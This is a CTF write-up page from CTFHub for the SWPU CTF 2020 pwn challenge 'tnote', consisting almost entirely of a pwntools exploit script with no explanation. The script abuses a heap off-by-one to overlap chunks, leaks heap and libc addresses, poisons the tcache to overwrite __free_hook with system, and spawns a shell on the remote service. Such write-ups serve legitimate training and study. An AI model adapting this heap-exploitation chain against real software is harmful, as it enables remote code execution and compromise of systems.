CTFHub

Writeup

tnote

发表于 更新于 分类于
Challenge | 2020 | SWPU CTF 2020 | Pwn | tnote

点击此处获得更好的阅读体验

WriteUp来源

官方WP

解题思路

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
# context.log_level = 'debug'
binary = "./tnote"
ip = "**.**.**.**"
port = 10000
elf = ELF(binary)
def pwn(ip, port, debug):
    if debug == 1:
        sh = process(binary)
        lib = elf.libc
        # lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")  
    else:
        sh = remote(ip, port)
        lib = ELF("libc-2.27.so")  
        # lib = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    s       = lambda data               :sh.send(str(data))
    sa      = lambda delim,data         :sh.sendafter(str(delim), str(data))
    sl      = lambda data               :sh.sendline(str(data))
    sla     = lambda delim,data         :sh.sendlineafter(str(delim), str(data))
    r       = lambda numb=4096          :sh.recv(numb,timeout=5)
    ru      = lambda delims, drop=True  :sh.recvuntil(delims, drop,timeout=5)
    irt     = lambda                    :sh.interactive()
    uu32    = lambda data               :u32(data.ljust(4, b'\x00'))
    uu64    = lambda data               :u64(data.ljust(8, b'\x00'))
    lg      = lambda data               :log.success(data)
    def add(size):
        sla(":","A");
        sla("?",str(size));
    def free(idx):
        sla(":","D");
        sla("?",str(idx))
    def edit(idx,content):
        sla(":","E")
        sla("?",str(idx))
        sa(":",content)
    def show(idx):
        sla(":","S")
        sla("?",str(idx))
    add(0x18)
    add(0x18)
    add(0x58)
    add(0x18)
    add(0x78)
    payload = "\x11" * 0x18 + p8(0x81)
    edit(0,payload)
    free(1)
    add(0x78)
    free(4)
    payload = "\x11" * 0x18 + p64(0x81) + "\n"
    edit(1,payload)
    free(2)
    payload = "\x11" * 0x18 + p64(0xdeadbeefdeadbeef) + "\n"
    edit(1,payload)
    show(1)
    ru("\x11" * 0x18 + p64(0xdeadbeefdeadbeef))
    heap_base = uu64(r(6)) - 0x320
    payload = "\x11" * 0x18 + p64(0x81)
    payload += p64(heap_base + 0x10) + "\n"
    edit(1,payload)
    add(0x78)
    add(0x78)
    payload = p64(0) * 4 + p64(0x0f0f0f0f0f0f0f0f) + p64(0) * 9 + p64(heap_base + 0x10) + "\n"
    edit(4,payload)
    free(4)
    add(0x78)
    show(4)
    ru("content:")
    main_arena = uu64(r(6))
    success("main_arena = "+hex(main_arena))
    libc = main_arena - lib.symbols[b'__malloc_hook'] - 96 - 0x10
    success("libc = "+hex(libc))
    lib.address = libc
    system = lib.symbols[b'system']
    __free_hook = lib.symbols[b'__free_hook']
    success("libc_base = "+hex(libc))
    success("sys_addr = "+hex(system))
    payload = p64(0) * 4 + p64(0x0f0f0f0f0f0f0f0f) + p64(0) * 9 + p64(__free_hook - 8) + "\n"
    edit(4,payload)
    add(0x78)
    edit(5,"/bin/sh\x00" + p64(system) + "\n")
    free(5)
    irt()

if __name__ == '__main__':
  pwn(ip, port, 0)